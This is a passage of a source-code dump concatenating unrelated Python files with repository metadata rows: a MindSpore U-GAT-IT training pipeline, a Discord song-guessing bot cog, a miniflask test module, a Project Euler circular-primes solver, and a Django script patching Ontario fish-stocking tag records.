# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
pipline for U-GAT-IT
"""
import time
import math
import os
from glob import glob
import cv2
import numpy as np
import mindspore.ops as ops
from mindspore import nn
from mindspore import save_checkpoint, load_checkpoint, load_param_into_net
from mindspore.common import initializer as init
from mindspore.communication.management import get_rank
from .networks import ResnetGenerator, Discriminator, GWithLossCell, DWithLossCell
from .cell import TrainOneStepG, TrainOneStepD, Generator
from ..utils.tools import denorm, tensor2numpy, RGB2BGR, cam
from ..dataset.dataset import TrainDataLoader, TestDataLoader
from ..metrics.metrics import mean_kernel_inception_distance
class UGATIT:
    """Training/evaluation pipeline for the U-GAT-IT image translation model.

    Wires together the two generators (A->B and B->A), the four
    discriminators (global and local for each domain), their optimizers
    and MindSpore train-step cells, and drives training, checkpointing
    and testing.
    """
    def __init__(self, args):
        # Cache every hyper-parameter from the parsed CLI `args`.
        self.light = args.light
        self.distributed = args.distributed
        self.mode = args.phase
        if self.light:
            self.model_name = 'UGATIT_light'
        else:
            self.model_name = 'UGATIT'
        self.modelart = args.enable_modelarts
        self.train_url = args.train_url
        self.output_path = args.output_path
        self.dataset = args.dataset
        self.data_path = args.data_path
        self.decay_flag = args.decay_flag
        self.epoch = args.epoch
        self.decay_epoch = args.decay_epoch
        self.batch_size = args.batch_size
        self.print_freq = args.print_freq
        self.save_freq = args.save_freq
        # Only 'linear' decay is implemented; see get_lr().
        self.lr_policy = 'linear'
        self.loss_scale = args.loss_scale
        self.lr = args.lr
        self.weight_decay = args.weight_decay
        self.ch = args.ch
        self.use_global_norm = args.use_global_norm
        """ Weight """
        # Loss term weights, packed in the order the loss cells expect.
        self.adv_weight = args.adv_weight
        self.cycle_weight = args.cycle_weight
        self.identity_weight = args.identity_weight
        self.cam_weight = args.cam_weight
        self.weights = [self.adv_weight, self.cycle_weight, self.identity_weight, self.cam_weight]
        """ Generator """
        self.n_res = args.n_res
        """ Discriminator """
        self.n_dis = args.n_dis
        self.img_size = args.img_size
        self.img_ch = args.img_ch
        self.resume = args.resume
        """utils"""
        # NOTE(review): these ops are created here but not used in this class
        # body -- presumably kept for subclasses/callers; confirm before removal.
        self.oneslike = ops.OnesLike()
        self.zeroslike = ops.ZerosLike()
        self.assign = ops.Assign()
        print()
        print("##### Information #####")
        print("# light : ", self.light)
        print("# dataset : ", self.dataset)
        print("# batch_size : ", self.batch_size)
        print("# epochs: ", self.epoch)
        print()
        print("##### Generator #####")
        print("# residual blocks : ", self.n_res)
        print()
        print("##### Discriminator #####")
        print("# discriminator layer : ", self.n_dis)
        print()
        print("##### Weight #####")
        print("# adv_weight : ", self.adv_weight)
        print("# cycle_weight : ", self.cycle_weight)
        print("# identity_weight : ", self.identity_weight)
        print("# cam_weight : ", self.cam_weight)

    ##################################################################################
    # Model
    ##################################################################################

    def build_model(self):
        """Build dataloaders, networks, optimizers and train-step cells.

        Must be called once after construction and before train()/test().
        When `resume` is set, restores the latest checkpoint found under
        `<output_path>/<dataset>/model` and skips the already-trained epochs.
        """
        self.train_nums = 1
        if self.mode == 'train':
            train_loader, test_loader, train_nums = TrainDataLoader(self.img_size,
                                                                    self.data_path,
                                                                    self.dataset,
                                                                    self.batch_size,
                                                                    self.distributed)
            self.train_loader = train_loader
            self.test_iterator = test_loader.create_dict_iterator()
            self.train_nums = train_nums
            print("Training dataset size = ", self.train_nums)
        elif self.mode == 'test':
            test_loader = TestDataLoader(self.img_size,
                                         self.data_path,
                                         self.dataset)
            self.test_iterator = test_loader.create_dict_iterator()
        else:
            raise RuntimeError("Invalid mode")
        print("Dataset load finished")

        self.genA2B = ResnetGenerator(input_nc=3,
                                      output_nc=3,
                                      ngf=self.ch,
                                      n_blocks=self.n_res,
                                      img_size=self.img_size,
                                      light=self.light)
        self.genB2A = ResnetGenerator(input_nc=3,
                                      output_nc=3,
                                      ngf=self.ch,
                                      n_blocks=self.n_res,
                                      img_size=self.img_size,
                                      light=self.light)
        # Global (7-layer) and local (5-layer) discriminators per domain.
        self.disGA = Discriminator(input_nc=3, ndf=self.ch, n_layers=7)
        self.disGB = Discriminator(input_nc=3, ndf=self.ch, n_layers=7)
        self.disLA = Discriminator(input_nc=3, ndf=self.ch, n_layers=5)
        self.disLB = Discriminator(input_nc=3, ndf=self.ch, n_layers=5)
        self.generator = Generator(self.genA2B, self.genB2A)

        self.init_weights(self.genA2B, 'KaimingUniform', math.sqrt(5))
        self.init_weights(self.genB2A, 'KaimingUniform', math.sqrt(5))
        self.init_weights(self.disGA, 'KaimingUniform', math.sqrt(5))
        self.init_weights(self.disGB, 'KaimingUniform', math.sqrt(5))
        self.init_weights(self.disLA, 'KaimingUniform', math.sqrt(5))
        self.init_weights(self.disLB, 'KaimingUniform', math.sqrt(5))

        self.start_epoch = 1
        if self.resume:
            model_list = glob(os.path.join(self.output_path, self.dataset, 'model', '*.ckpt'))
            if model_list:
                model_list.sort()
                # Checkpoint names end in ..._params_%07d.ckpt: extract the epoch.
                self.start_epoch = int(model_list[-1].split('_')[-1].split('.')[0])
                self.load(os.path.join(self.output_path, self.dataset, 'model'), self.start_epoch)
                print(" [*]Epoch %d Load SUCCESS" % self.start_epoch)
        # Skip the portion of the lr schedule already consumed by resumed epochs.
        start_step = (self.start_epoch - 1) * self.train_nums
        self.learning_rate = self.get_lr()[start_step:]
        loss_scale = self.loss_scale
        self.D_loss_net = DWithLossCell(self.disGA,
                                        self.disLA,
                                        self.disGB,
                                        self.disLB,
                                        self.weights)
        self.G_loss_net = GWithLossCell(self.generator,
                                        self.disGA,
                                        self.disLA,
                                        self.disGB,
                                        self.disLB,
                                        self.weights)
        self.G_optim = nn.Adam(self.generator.trainable_params(),
                               learning_rate=self.learning_rate,
                               beta1=0.5,
                               beta2=0.999,
                               weight_decay=self.weight_decay)
        self.D_optim = nn.Adam(self.D_loss_net.trainable_params(),
                               learning_rate=self.learning_rate,
                               beta1=0.5,
                               beta2=0.999,
                               weight_decay=self.weight_decay)
        self.D_train_net = TrainOneStepD(self.D_loss_net, self.D_optim, loss_scale, self.use_global_norm)
        self.G_train_net = TrainOneStepG(self.G_loss_net, self.generator, self.G_optim,
                                         loss_scale, self.use_global_norm)

    def get_lr(self):
        """
        Learning rate generator.

        Returns a per-step schedule: constant `lr` for the first
        `decay_epoch` epochs, then linearly decayed to zero over the
        remaining epochs (one entry per training step).
        """
        if self.lr_policy == 'linear':
            lrs = [self.lr] * self.train_nums * self.decay_epoch
            for epoch in range(self.decay_epoch, self.epoch):
                lr_epoch = self.lr * (self.epoch - epoch) / (self.epoch - self.decay_epoch)
                lrs += [lr_epoch] * self.train_nums
            return lrs
        # NOTE(review): a scalar return here would break the slicing done in
        # build_model(); unreachable while lr_policy is hard-coded to 'linear'.
        return self.lr

    def init_weights(self, net, init_type='normal', init_gain=0.02):
        """Initialize conv/dense weights of `net` with the chosen scheme and
        reset norm-layer gamma/beta to ones/zeros."""
        for _, cell in net.cells_and_names():
            if isinstance(cell, (nn.Conv2d, nn.Conv2dTranspose, nn.Dense)):
                if init_type == 'normal':
                    cell.weight.set_data(init.initializer(init.Normal(init_gain), cell.weight.shape))
                elif init_type == 'xavier':
                    cell.weight.set_data(init.initializer(init.XavierUniform(init_gain), cell.weight.shape))
                elif init_type == 'KaimingUniform':
                    cell.weight.set_data(init.initializer(init.HeUniform(init_gain), cell.weight.shape))
                elif init_type == 'constant':
                    cell.weight.set_data(init.initializer(0.0005, cell.weight.shape))
                else:
                    raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
            elif isinstance(cell, (nn.GroupNorm, nn.BatchNorm2d)):
                cell.gamma.set_data(init.initializer('ones', cell.gamma.shape))
                cell.beta.set_data(init.initializer('zeros', cell.beta.shape))

    def train(self):
        """Run the training loop: alternate G/D updates, clamp the rho
        parameters of AdaILN/ILN layers, and periodically dump previews
        and checkpoints (rank 0 only when distributed)."""
        self.D_train_net.set_train()
        self.G_train_net.set_train()
        data_loader = self.train_loader.create_dict_iterator()
        # training loop
        print('training start !')
        for epoch in range(self.start_epoch, self.epoch + 1):
            i = 0
            for data in data_loader:
                i += 1
                start_time = time.time()
                real_A = data["image_A"]
                real_B = data["image_B"]
                # Update: generator step first, discriminator step on its outputs.
                fake_A2B, fake_B2A, Generator_loss = self.G_train_net(real_A, real_B)
                Discriminator_loss = self.D_train_net(real_A, real_B, fake_A2B, fake_B2A)
                # clip parameter of AdaILN and ILN, applied after optimizer step
                for m in self.genA2B.cells_and_names():
                    if hasattr(m[1], 'rho'):
                        w = m[1].rho.data
                        w = ops.clip_by_value(w, 0, 1)
                        m[1].rho.data.set_data(w)
                for m in self.genB2A.cells_and_names():
                    if hasattr(m[1], 'rho'):
                        w = m[1].rho.data
                        w = ops.clip_by_value(w, 0, 1)
                        m[1].rho.data.set_data(w)
                print("epoch %d:[%5d/%5d] time per iter: %4.4f " % (epoch,
                                                                    i,
                                                                    self.train_nums,
                                                                    time.time() - start_time))
                print("d_loss:", Discriminator_loss)
                print("g_loss:", Generator_loss)
            if epoch % self.print_freq == 0:
                # Dump preview images and "latest" checkpoints; in distributed
                # mode only rank 0 writes to disk.
                if self.distributed:
                    if get_rank() == 0:
                        self.print(epoch)
                        save_checkpoint(self.genA2B,
                                        os.path.join(self.output_path, self.dataset + '_genA2B_params_latest.ckpt'))
                        save_checkpoint(self.genB2A,
                                        os.path.join(self.output_path, self.dataset + '_genB2A_params_latest.ckpt'))
                        save_checkpoint(self.disGA,
                                        os.path.join(self.output_path, self.dataset + '_disGA_params_latest.ckpt'))
                        save_checkpoint(self.disGB,
                                        os.path.join(self.output_path, self.dataset + '_disGB_params_latest.ckpt'))
                        save_checkpoint(self.disLA,
                                        os.path.join(self.output_path, self.dataset + '_disLA_params_latest.ckpt'))
                        save_checkpoint(self.disLB,
                                        os.path.join(self.output_path, self.dataset + '_disLB_params_latest.ckpt'))
                else:
                    self.print(epoch)
                    save_checkpoint(self.genA2B,
                                    os.path.join(self.output_path, self.dataset + '_genA2B_params_latest.ckpt'))
                    save_checkpoint(self.genB2A,
                                    os.path.join(self.output_path, self.dataset + '_genB2A_params_latest.ckpt'))
                    save_checkpoint(self.disGA,
                                    os.path.join(self.output_path, self.dataset + '_disGA_params_latest.ckpt'))
                    save_checkpoint(self.disGB,
                                    os.path.join(self.output_path, self.dataset + '_disGB_params_latest.ckpt'))
                    save_checkpoint(self.disLA,
                                    os.path.join(self.output_path, self.dataset + '_disLA_params_latest.ckpt'))
                    save_checkpoint(self.disLB,
                                    os.path.join(self.output_path, self.dataset + '_disLB_params_latest.ckpt'))
            if epoch % self.save_freq == 0:
                # Numbered (per-epoch) checkpoints for resume/test.
                if self.distributed:
                    if get_rank() == 0:
                        self.save(os.path.join(self.output_path, self.dataset, 'model'), epoch)
                else:
                    self.save(os.path.join(self.output_path, self.dataset, 'model'), epoch)

    def print(self, epoch):
        """Save a grid of intermediate results for `epoch`.

        For 5 test samples, stacks original / identity / translation /
        cycle-reconstruction images (plus CAM heatmaps) vertically and
        concatenates the samples horizontally, writing A2B_*.png and
        B2A_*.png under `<output_path>/<dataset>/img`.
        NOTE: the method name shadows the builtin print() inside this class.
        """
        test_sample_num = 5
        # 7 rows per sample: real, id-heatmap, identity, heatmap, fake,
        # cycle-heatmap, cycle reconstruction.
        A2B = np.zeros((self.img_size * 7, 0, 3))
        B2A = np.zeros((self.img_size * 7, 0, 3))
        for _ in range(test_sample_num):
            data = next(self.test_iterator)
            real_A = data["image_A"]
            real_B = data["image_B"]
            fake_A2B, _, fake_A2B_heatmap = self.genA2B(real_A)
            fake_B2A, _, fake_B2A_heatmap = self.genB2A(real_B)
            fake_A2B2A, _, fake_A2B2A_heatmap = self.genB2A(fake_A2B)
            fake_B2A2B, _, fake_B2A2B_heatmap = self.genA2B(fake_B2A)
            # Without copying real_A and real_B tensors before feeding them
            # into genB2A and genA2B does not work correctly with the GPU backend.
            fake_A2A, _, fake_A2A_heatmap = self.genB2A(real_A.copy())
            fake_B2B, _, fake_B2B_heatmap = self.genA2B(real_B.copy())
            A2B = np.concatenate((A2B, np.concatenate((RGB2BGR(tensor2numpy(denorm(real_A[0]))),
                                                       cam(tensor2numpy(fake_A2A_heatmap[0]), self.img_size),
                                                       RGB2BGR(tensor2numpy(denorm(fake_A2A[0]))),
                                                       cam(tensor2numpy(fake_A2B_heatmap[0]), self.img_size),
                                                       RGB2BGR(tensor2numpy(denorm(fake_A2B[0]))),
                                                       cam(tensor2numpy(fake_A2B2A_heatmap[0]), self.img_size),
                                                       RGB2BGR(tensor2numpy(denorm(fake_A2B2A[0])))), 0)), 1)
            B2A = np.concatenate((B2A, np.concatenate((RGB2BGR(tensor2numpy(denorm(real_B[0]))),
                                                       cam(tensor2numpy(fake_B2B_heatmap[0]), self.img_size),
                                                       RGB2BGR(tensor2numpy(denorm(fake_B2B[0]))),
                                                       cam(tensor2numpy(fake_B2A_heatmap[0]), self.img_size),
                                                       RGB2BGR(tensor2numpy(denorm(fake_B2A[0]))),
                                                       cam(tensor2numpy(fake_B2A2B_heatmap[0]), self.img_size),
                                                       RGB2BGR(tensor2numpy(denorm(fake_B2A2B[0])))), 0)), 1)
        cv2.imwrite(os.path.join(self.output_path, self.dataset, 'img', 'A2B_%07d.png' % epoch), A2B * 255.0)
        cv2.imwrite(os.path.join(self.output_path, self.dataset, 'img', 'B2A_%07d.png' % epoch), B2A * 255.0)

    def save(self, savedir, epoch):
        """Save all six sub-networks as epoch-numbered checkpoints in `savedir`."""
        save_checkpoint(self.genA2B, os.path.join(savedir, self.dataset + '_genA2B_params_%07d.ckpt' % epoch))
        save_checkpoint(self.genB2A, os.path.join(savedir, self.dataset + '_genB2A_params_%07d.ckpt' % epoch))
        save_checkpoint(self.disGA, os.path.join(savedir, self.dataset + '_disGA_params_%07d.ckpt' % epoch))
        save_checkpoint(self.disGB, os.path.join(savedir, self.dataset + '_disGB_params_%07d.ckpt' % epoch))
        save_checkpoint(self.disLA, os.path.join(savedir, self.dataset + '_disLA_params_%07d.ckpt' % epoch))
        save_checkpoint(self.disLB, os.path.join(savedir, self.dataset + '_disLB_params_%07d.ckpt' % epoch))

    def load(self, loaddir, epoch):
        """load checkpoint

        In test mode only genA2B is restored; in train mode all six
        sub-networks are.  Parameters that could not be matched are
        reported, not raised.
        """
        genA2B_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_genA2B_params_%07d.ckpt' % epoch))
        not_load = {}
        not_load['genA2B'] = load_param_into_net(self.genA2B, genA2B_params)
        if self.mode == 'train':
            genB2A_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_genB2A_params_%07d.ckpt' % epoch))
            disGA_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disGA_params_%07d.ckpt' % epoch))
            disGB_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disGB_params_%07d.ckpt' % epoch))
            disLA_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disLA_params_%07d.ckpt' % epoch))
            disLB_params = load_checkpoint(os.path.join(loaddir, self.dataset + '_disLB_params_%07d.ckpt' % epoch))
            not_load['genB2A'] = load_param_into_net(self.genB2A, genB2A_params)
            not_load['disGA'] = load_param_into_net(self.disGA, disGA_params)
            not_load['disGB'] = load_param_into_net(self.disGB, disGB_params)
            not_load['disLA'] = load_param_into_net(self.disLA, disLA_params)
            not_load['disLB'] = load_param_into_net(self.disLB, disLB_params)
        print("these params are not loaded: ", not_load)

    def test(self, inception_ckpt_path=None):
        """Translate the test set A->B with the latest checkpoint and save
        input/output pairs; optionally compute the mean KID metric when an
        Inception checkpoint path is given."""
        # NOTE(review): set_train(True) during testing looks intentional for
        # U-GAT-IT's instance-norm behavior, but confirm against the networks.
        self.genA2B.set_train(True)
        output_path = os.path.join(self.output_path, self.dataset)
        model_list = glob(os.path.join(output_path, 'model', '*.ckpt'))
        if model_list:
            model_list.sort()
            start_epoch = int(model_list[-1].split('_')[-1].split('.')[0])
            self.load(os.path.join(output_path, 'model'), start_epoch)
            print(" [*] epoch %d Load SUCCESS" % start_epoch)
        else:
            print(" [*] Load FAILURE")
            return
        for n, data in enumerate(self.test_iterator):
            real_A = data['image_A']
            fake_A2B, _, _ = self.genA2B(real_A)
            A = RGB2BGR(tensor2numpy(denorm(real_A[0])))
            A2B = RGB2BGR(tensor2numpy(denorm(fake_A2B[0])))
            cv2.imwrite(os.path.join(output_path, 'test', 'A_%d.png' % (n + 1)), A * 255.0)
            cv2.imwrite(os.path.join(output_path, 'test', 'A2B_%d.png' % (n + 1)), A2B * 255.0)
        if inception_ckpt_path is not None:
            dataset_path = os.path.join(self.data_path, self.dataset)
            mean_kernel_inception_distance(output_path, dataset_path, inception_ckpt_path)
| 48.932203 | 117 | 0.539562 | 18,863 | 0.933396 | 0 | 0 | 0 | 0 | 0 | 0 | 2,954 | 0.146172 |
35041a09e77bfa96a1dd1889fc42808e359d1076 | 4,863 | py | Python | bot/cogs/music.py | Nemika-Haj/Guess-The-Song | b206e5667fdc5302f2ca87caa3a59f4b4c126077 | [
"MIT"
] | 1 | 2021-03-03T18:26:53.000Z | 2021-03-03T18:26:53.000Z | bot/cogs/music.py | Nemika-Haj/Guess-The-Song | b206e5667fdc5302f2ca87caa3a59f4b4c126077 | [
"MIT"
] | null | null | null | bot/cogs/music.py | Nemika-Haj/Guess-The-Song | b206e5667fdc5302f2ca87caa3a59f4b4c126077 | [
"MIT"
] | null | null | null | import discord, youtube_dl, asyncio, json, random, os
from youtube_search import YoutubeSearch
from core import checks, embeds, files, database
from discord.ext import tasks
from difflib import SequenceMatcher
# Shorthand for the discord.py commands extension used by the cog below.
commands = discord.ext.commands

# Options handed to youtube_dl; note 'noplaylist' is False, so playlist
# URLs resolve to a list of entries (handled in YTDLSource.from_url).
ytdl_format_options = {
    'format': 'bestaudio/best',
    'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
    'restrictfilenames': True,
    'noplaylist': False,
    'nocheckcertificate': True,
    'ignoreerrors': False,
    'logtostderr': False,
    'quiet': True,
    'no_warnings': True,
    'default_search': 'auto',
    'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes
}

# '-vn' strips the video stream; only audio is piped to Discord.
ffmpeg_options = {
    'options': '-vn'
}

# Single module-level downloader instance shared by all commands.
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
class YTDLSource(discord.PCMVolumeTransformer):
    """Volume-adjustable audio source backed by an FFmpeg stream that was
    resolved through the module-level youtube_dl instance."""

    def __init__(self, source, *, data, volume=0.5):
        super().__init__(source, volume)
        # Keep the raw youtube_dl info dict around; callers read fields such
        # as 'duration', 'thumbnail' and 'webpage_url' from it.
        self.data = data
        self.title = data.get('title')
        self.url = data.get('url')

    @classmethod
    async def from_url(cls, url, *, loop=None):
        """Resolve *url* off the event loop and build a playable source."""
        loop = loop or asyncio.get_event_loop()
        info = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=False))
        if 'entries' in info:
            # take first item from a playlist
            info = info['entries'][0]
        stream_url = info['url']
        return cls(discord.FFmpegPCMAudio(stream_url, **ffmpeg_options), data=info)
class Music(commands.Cog):
    def __init__(self, bot):
        """Store the running bot and initialize per-cog state."""
        self.bot = bot
        # Voice states with a round currently in progress; play() refuses to
        # start a second round for a voice state already in this list.
        self.playing = []
def similar(self, s_1, s_2): return SequenceMatcher(None, s_1, s_2).ratio() > 0.6
@commands.guild_only()
@commands.command()
async def play(self, ctx, *, category="random"):
if not ctx.author.voice: return
if ctx.author.voice in self.playing: return await ctx.send(embed=embeds.Embeds("Already playing!").error())
categories = [i[:-5] for i in os.listdir("data") if i.endswith(".json")]
if not category.lower() in categories: return await ctx.send(embed=embeds.Embeds("There's no such category! The available categories are; " + ','.join(f"`{i}`" for i in categories)).error())
if ctx.voice_client.is_playing():
ctx.voice_client.stop()
song = random.choice(files.Data(category).json_read())
player = await YTDLSource.from_url(song, loop=self.bot.loop)
title = player.title.lower()
ctx.voice_client.play(player)
await ctx.send(embed=discord.Embed(
title="Guess The Song!",
description=f"Now playing track! Try to guess the song before it's over!\n*`Mode: {category}`*",
color=discord.Color.green()
))
self.playing.append(ctx.author.voice)
try:
answer = await self.bot.wait_for(
"message",
timeout=player.data['duration'],
check=lambda message: self.similar(message.content.lower(), title) or (message.content.lower() == "forcestop" and message.author.id == ctx.author.id)
)
except asyncio.TimeoutError:
self.playing.remove(ctx.author.voice)
await ctx.voice_client.disconnect()
return await ctx.send(embed=discord.Embed(
title="Song is over!",
description=f"Nobody guessed the song! It was `{player.title}`!",
color=discord.Color.red(),
url=player.data['webpage_url']
)
.set_thumbnail(url=player.data['thumbnail']))
if answer.content.lower() == "forcestop":
self.playing.remove(ctx.author.voice)
await ctx.voice_client.disconnect()
return await ctx.send(embed=discord.Embed(
title="Force Stop!",
description=f"The song was force stopped! It was `{player.title}`!",
color=discord.Color.red(),
url=player.data['webpage_url']
)
.set_thumbnail(url=player.data['thumbnail']))
database.Levels(answer.author.id).add_xp()
self.playing.remove(ctx.author.voice)
return await ctx.send(embed=discord.Embed(
title="Congratulations!",
description=f"{answer.author.mention} guessed the song! It was `{player.title}`!",
color=discord.Color.green(),
url=player.data['webpage_url']
)
.set_thumbnail(url=player.data['thumbnail']))
@play.before_invoke
async def ensure_voice(self, ctx):
if not ctx.voice_client:
if not ctx.author.voice:
return await ctx.send(embed=embeds.Embeds("You must be connected in a voice channel!").error())
else:
await ctx.author.voice.channel.connect()
def setup(bot):
    # Entry point used by discord.py's extension loader (bot.load_extension).
    bot.add_cog(Music(bot))
3505b0795f024d936847202220a08964b18c6216 | 573 | py | Python | tests/argparse/special/modules/defaults/__init__.py | da-h/miniflask | d5e594153cca4ce4d30db01b1d06d05afa9e7aaa | [
"MIT"
] | 5 | 2020-02-17T12:14:36.000Z | 2020-02-27T12:09:05.000Z | tests/argparse/special/modules/defaults2/__init__.py | da-h/miniflask | d5e594153cca4ce4d30db01b1d06d05afa9e7aaa | [
"MIT"
] | 69 | 2020-04-03T08:16:35.000Z | 2021-12-21T15:46:29.000Z | tests/argparse/special/modules/defaults2/__init__.py | da-h/miniflask | d5e594153cca4ce4d30db01b1d06d05afa9e7aaa | [
"MIT"
] | 1 | 2020-04-02T15:46:39.000Z | 2020-04-02T15:46:39.000Z |
def printVal(state, name):
    """Print one state variable as '<fuzzy name>: <value>'."""
    current = state[name]
    label = "%s:" % state.fuzzy_names[name]
    print(label, current)
def print_all(state):
    """Dump every default variable managed by this module."""
    for key in (
        "var_default",
        "var_default_override",
        "var_default_override_twice",
        "var_default_override_twice_and_cli",
    ):
        printVal(state, key)
def register(mf):
    """Register this module's default parameters and its print_all event."""
    defaults = {
        "var_default": 1,
        "var_default_override": 2,
        "var_default_override_twice": 3,
        "var_default_override_twice_and_cli": 4,
    }
    mf.register_defaults(defaults)
    # non-unique: other modules may also hook the 'print_all' event
    mf.register_event('print_all', print_all, unique=False)
| 26.045455 | 59 | 0.685864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 214 | 0.373473 |
35062f45b2371121df6f139d2c546ce0211006a8 | 867 | py | Python | Resene naloge/euler35.py | CadezDavid/ProjectEuler | 9e11aa5782fb600c98eba9e04766b3bd79acea0e | [
"MIT"
] | null | null | null | Resene naloge/euler35.py | CadezDavid/ProjectEuler | 9e11aa5782fb600c98eba9e04766b3bd79acea0e | [
"MIT"
] | null | null | null | Resene naloge/euler35.py | CadezDavid/ProjectEuler | 9e11aa5782fb600c98eba9e04766b3bd79acea0e | [
"MIT"
] | null | null | null | import itertools
stevke = ['1', '3', '7', '9']
def je_prastevilo(n):
    """Return True if n is a prime number (trial division by odd factors).

    Fix: the original loop re-tested ``n % 2 == 0`` on every iteration,
    a dead condition — even n already returned in the first branch.
    """
    if n < 2 or n % 2 == 0:
        return n == 2
    i = 3
    while i * i <= n:
        if n % i == 0:
            return False
        i += 2
    return True
def zasukej(nabor):
    """Return every cyclic rotation of the digit strings in *nabor* as ints."""
    digits = list(nabor)
    rotations = []
    for _ in range(len(digits)):
        rotations.append(int(''.join(digits)))
        # rotate right: move the last digit to the front
        digits.insert(0, digits.pop())
    return rotations
# Project Euler 35: count circular primes below one million. For multi-digit
# candidates every digit must be 1, 3, 7 or 9, otherwise some rotation would
# end in an even digit or 5 and could not be prime.
circular_primes = []
for ponavljanje in range(1, 7):
    for stevilo in itertools.product(stevke, repeat=ponavljanje):
        # keep the whole rotation cycle only if every rotation is prime
        if all(je_prastevilo(permutacija) for permutacija in zasukej(stevilo)):
            circular_primes += zasukej(stevilo)
# Single-digit primes (including 2 and 5) are circular by definition; the
# set() below removes the duplicates this re-adds (3 and 7).
for stevilo in range(10):
    if je_prastevilo(stevilo):
        circular_primes.append(stevilo)
print(sorted(list(set(circular_primes))), len(set(circular_primes)))
3506323d7b6298be2f53323222f210a843ce3b94 | 6,650 | py | Python | utils/update_ontario_huron_stocking.py | AdamCottrill/fsdivz | 98dd1f35a08dba26424e2951a40715e01399478c | [
"MIT"
] | null | null | null | utils/update_ontario_huron_stocking.py | AdamCottrill/fsdivz | 98dd1f35a08dba26424e2951a40715e01399478c | [
"MIT"
] | 6 | 2020-02-12T00:03:40.000Z | 2020-11-30T01:20:56.000Z | utils/update_ontario_huron_stocking.py | AdamCottrill/fsdviz | 98dd1f35a08dba26424e2951a40715e01399478c | [
"MIT"
] | null | null | null | """
~/utils/update_ontario_stocking.py
Created: 23 Jan 2019 15:29:22
DESCRIPTION:
This script updates the ontario data in the lake wide cwt database.
Updates include tag type, and sequence number for sequential cwts, cwt
manufacturer (where it should have been Micro Mark (MM))
Updates are preformed on both stocking (below) and recovery (NOT YET)
tables.
This script should be run after the lakewide database has been
built and populated with both US and ontario data.
A. Cottrill
=============================================================
"""
import csv
import re
from collections import namedtuple
from fsdviz.common.models import CWT, CWTsequence
from fsdviz.stocking.models import StockingEvent
# ======================================================
# FSIS_ID to ID
# to update the OMNR stocking data, we need a dictionary that maps
# the ontario id values (fs_event) to the StockingEvent.Id in the
# current database
# get the id numbers and notes for each lake huron ontario stocking event
ont_events = StockingEvent.objects.filter(
    agency__abbrev="OMNR", jurisdiction__lake__abbrev="HU"
)
# ontario fs_event numbers are in the notes field as 'fs_event:
# <fsis_id>' this code extracts the fsis_id from the notes and pairs
# it with its corresponding id in the current lakewide database.
# returns a list of tuples of the form: (<fsis_id>, <id>)
# id_pairs = [(int(re.match('fs_event: (\d+)',x['notes']).groups()[0]), x['id'])
# for x in ont_events]
# create a dictionary with the fsis_id as key - makes it easy to get
# associated id for the lakewide db:
fsis2lwdb = {x.agency_stock_id: x.id for x in ont_events}
# ======================================================
# STOCKED SEQUENTIAL CWTS
print("Updating Ontario's Sequential tags...")
# the csv file "MNRF_stocking_events_sequential_cwts.csv" contains a
# list of stocking events associated with sequential csv and the start
# and end the range associated with that event.
# create a named tuple that will hold our stocking event info:
seqCWT = namedtuple("seqCWT", "fsis_event, cwt_number, seq_start, seq_end")
fname = "utils/patches/MNRF_stocking_events_sequential_cwts.csv"
with open(fname) as csvfile:
    reader = csv.reader(csvfile)
    next(reader, None)  # skip header
    seqcwt_events = [seqCWT(*x) for x in reader]
# sanity peek at the first few parsed rows
for x in seqcwt_events[:3]:
    print(x)
# make sure that all of the cwts are in the database - and that Lake
# Huron is the only lake and agency to stock that those tags.
# NOTE(review): cwt_numbers is never used after this line.
cwt_numbers = list({x.cwt_number for x in seqcwt_events})
for event in seqcwt_events:
    cwt = CWT.objects.filter(cwt_number=event.cwt_number).first()
    if cwt is None:
        print(event)
# now loop over the sequential cwt events and find the associated cwt
# and cwt_sequences in our database. Update the cwt start, end and tag
# type for each one. Keep a list of errors and print them out if
# anything goes wrong.
oops = []
for event in seqcwt_events:
    cwt = CWT.objects.filter(cwt_number=event.cwt_number).first()
    if cwt is None:
        print(event)
        oops.append(event)
        continue
    lwdb_id = fsis2lwdb[event.fsis_event]
    stocking_event = StockingEvent.objects.get(id=lwdb_id)
    # attach (or create) the sequence range and flag the cwt as sequential
    cwt_seq, created = CWTsequence.objects.get_or_create(
        cwt=cwt, sequence=(int(event.seq_start), int(event.seq_end))
    )
    cwt_seq.events.add(stocking_event)
    cwt.tag_type = "sequential"
    cwt.save()
# delete any cwtsequence events that are associated with sequential
# tags, but the sequence range is 0,0 (this was the old placeholder)
if oops:
    print("There were problems with the following sequential tag records:")
    for x in oops:
        print(x)
# make sure that there aren't any stocking events associated with
# sequential cwts series that end with 1 - they should have all been
# fixed in the last step.
# NOTE(review): "sequental" below is misspelled (elsewhere the value is
# "sequential"), so this filter probably matches nothing and the assert
# always passes — confirm the intended tag_type value.
oops = StockingEvent.objects.filter(
    cwt_series__seq_end=1, cwt_series__cwt__tag_type="sequental"
)
assert len(oops) == 0
# delete all of cwt series associated with seqential tags that start
# and end with 1 - these were created when the cwt was added but no
# longer point to any stocking events
childless_cwts = CWTsequence.objects.filter(
    cwt__tag_type="sequential", sequence__isnull=True
)
childless_cwts.delete()
# NOTE(review): foo is never used — leftover debugging query?
foo = CWTsequence.objects.filter(sequence__isnull=True)
#
# ======================================================
# CWT MANUFACTURER
print("Updating MicroMark tags...")
# this query returns a list of cwt numbers (without dashes) that we
# know were manufactured by Micro Mark. Only cwt numbers that are
# unique to micro mark are included (63-59-01, 63-41-04,
# 63-43-04, 63-56-03 were manufactured by both MM and NMT and must be
# handled seperately (below))
fname = "utils/patches/MNRF_MicroMark_cwts.csv"
with open(fname) as csvfile:
    reader = csv.reader(csvfile)
    next(reader, None)  # skip header
    mm_cwts = [x[0] for x in reader]
# BUG FIX: Agency was used below but never imported at the top of this
# script, so this section raised a NameError as soon as it ran.
from fsdviz.common.models import Agency
omnr = Agency.objects.get(abbrev="OMNR")
for cwt_num in mm_cwts:
